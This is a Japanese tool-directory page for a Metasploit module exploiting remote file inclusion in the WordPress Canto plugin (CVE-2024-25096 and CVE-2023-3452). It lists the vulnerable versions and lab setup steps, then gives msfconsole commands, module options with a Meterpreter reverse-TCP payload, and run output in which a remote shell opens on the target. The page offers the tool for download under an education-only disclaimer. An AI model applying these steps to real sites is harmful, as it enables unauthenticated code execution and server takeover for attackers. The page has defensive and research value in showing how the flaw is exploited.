Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Metasploit-Wordpress-Canto-Exploit-RCE — これは、CVE-2024-25096 および CVE-2023-3452 に対応した Metasploit エクスプロイトモジュールです。 | Kitploit
ツール/GitHubGitHub/puppetma4ster/metasploit-wordpress-canto-exploit-rce
エクスプロイトフレームワーク脆弱性分析ウェブアプリケーション悪用ペネトレーションテストリモートアクセスツールペイロード開発
GitHubpuppetma4ster/metasploit-wordpress-canto-exploit-rce

Metasploit-Wordpress-Canto-Exploit-RCE

これは、CVE-2024-25096 および CVE-2023-3452 に対応した Metasploit エクスプロイトモジュールです。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
5ヶ月前未レビュー

Metersploit exploit module canto RCE CVE-2024-25096 & CVE-2023-3452

このエクスプロイトは、RFI脆弱性CVE-2024-25096およびCVE-2023-3452のproof-of-workエクスプロイトであり、攻撃者がターゲット上に対話型リモートシェルセッションを確立することを可能にします。

CVE-2024-25096は、abspathパラメータを悪用し、include_once文を介してリモートファイルインクルージョンを許可します。 CVE-2023-3452も同様の手順ですが、"wp_abspath"パラメータがrequire_once文を介してリモートファイルインクルージョンを許可する点が異なります。 これにより、攻撃者はターゲットサーバー上で認証なしでコードを実行できます。

脆弱性データベースではCVE-2023-3452はバージョン3.0.4までに影響を与えるとされていますが、テストによりバージョン3.0.6までエクスプロイト可能であることが確認されました。この問題はバージョン3.0.7で修正され、このバージョンはCVE-2024-25096も修正しています。

要件

ターゲットが脆弱であるためには、以下の条件が必要です:

  • インストールされたcantoプラグイン <= 3.0.6
  • allow_url_include=On

使用方法

テストターゲットの設定

このリポジトリをクローンし、cantoプラグインをダウンロードします

Canto 3.0.4をダウンロード

Canto 3.0.5をダウンロード

Canto 3.0.6をダウンロード

以前のバージョンのCantoをダウンロードしたい場合は、リンクをコピーし、リンク内のバージョン番号を希望のバージョンに変更するだけです。

podman-compose up コマンドでコンテナ(docker-compose.yaml)を起動します。 任意のブラウザで http://localhost:8889/wp-admin/install.php を開き、WordPressアカウントを設定します。 スクリーンショット スクリーンショット

ログイン後、プラグインタブ → 新規プラグイン追加 → プラグインアップロードの順に選択し、cantoのzipファイルをインストールできます。

スクリーンショット スクリーンショット

エクスプロイトの設定

エクスプロイト(rce_exploit_cve_2024_25096.rb)をMetasploitモジュールフォルダに追加します。 Metasploitを起動し(msfconsole)、Metasploitをリロードします(reload_all)。 ペイロードを選択します。

root@kitploit:~
cp explit/wordpress_canto_plugin_file_include_rce.rb ~/.msf4/modules/exploits/
msfconsole
reload_all
search rce_exploit_cve_2024_25096
use 0

必要な変数の値を設定します

root@kitploit:~
モジュールオプション (exploit/rce_exploit_cve_2024_25096):

   名前         現在の設定               必須  説明
   ----        ---------------          --------   -----------
   Proxies                              no        形式 type:host:port[,type:host:port][...] のプロキシチェーン。サポートされるプロキシ: sapni, socks4, socks5, http, socks5h
   RHOSTS      127.0.0.1                yes       ターゲットホスト。 https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html を参照
   RPORT       8889                     yes       ポート
   SRVHOST     0.0.0.0                  yes       リッスンするローカルホストまたはネットワークインターフェース。ローカルマシンのアドレス、またはすべてのアドレスでリッスンする場合は0.0.0.0である必要があります。
   SRVPORT     8080                     yes       リッスンするローカルポート。
   SSL         false                    yes       SSLを使用
   SSLCert                              no        カスタムSSL証明書へのパス(デフォルトはランダム生成)
   TARGETFILE  get.php                  yes       脆弱なPHPファイル
   TARGETURI   /wp-content/plugins/canto  yes     cantoのルートディレクトリへのパス
   URIPATH                              no        このエクスプロイトに使用するURI(デフォルトはランダム)
   VHOST                                no        HTTPサーバーのバーチャルホスト


ペイロードオプション (php/meterpreter/reverse_tcp):

   名前  現在の設定         必須  説明
   ----  ---------------  --------  -----------
   LHOST 192.168.178.58   yes       リッスンアドレス(インターフェースを指定可能)
   LPORT 4444             yes       リッスンポート


エクスプロイトターゲット:

   ID  名前
   --  ----
   0   WordPressプラグイン <= 3.0.6



infoコマンドまたはinfo -dコマンドで完全なモジュール情報を表示します

エクスプロイトを実行して、うまくいくことを願いましょう ;)

root@kitploit:~
[msf](Jobs:0 Agents:0) exploit(rce_exploit_cve_2024_25096) >> run
[*] Started reverse TCP handler on 192.168.178.58:4444 
[*] Starting HTTP server...
[*] Using URL: http://192.168.178.58:8080/14Gs3AAu8j4
[*] Triggering RFI...
[*] Sending admin.php payload
[*] Sending stage (42137 bytes) to 192.168.178.58
[*] Meterpreter session 2 opened (192.168.178.58:4444 -> 192.168.178.58:54310) at 2026-03-01 20:15:23 +0100
[*] Server stopped.

(Meterpreter 2)(/var/www/html/wp-content/plugins/canto/includes/lib) >

免責事項

このプロジェクトは教育およびセキュリティ研究目的のみで提供されています。

著者は違法行為を奨励または容認しません。許可なくシステムを攻撃するためにこのコードを使用することは固く禁じられています。

著者は、このソフトウェアの誤用または損傷について一切の責任を負いません。ユーザーは、すべての適用法および規制を遵守する責任があります。

このコードは、ラボ環境、ペネトレーションテストの実施、セキュリティ研究など、明示的な許可がある環境でのみ使用してください。

ツールをダウンロード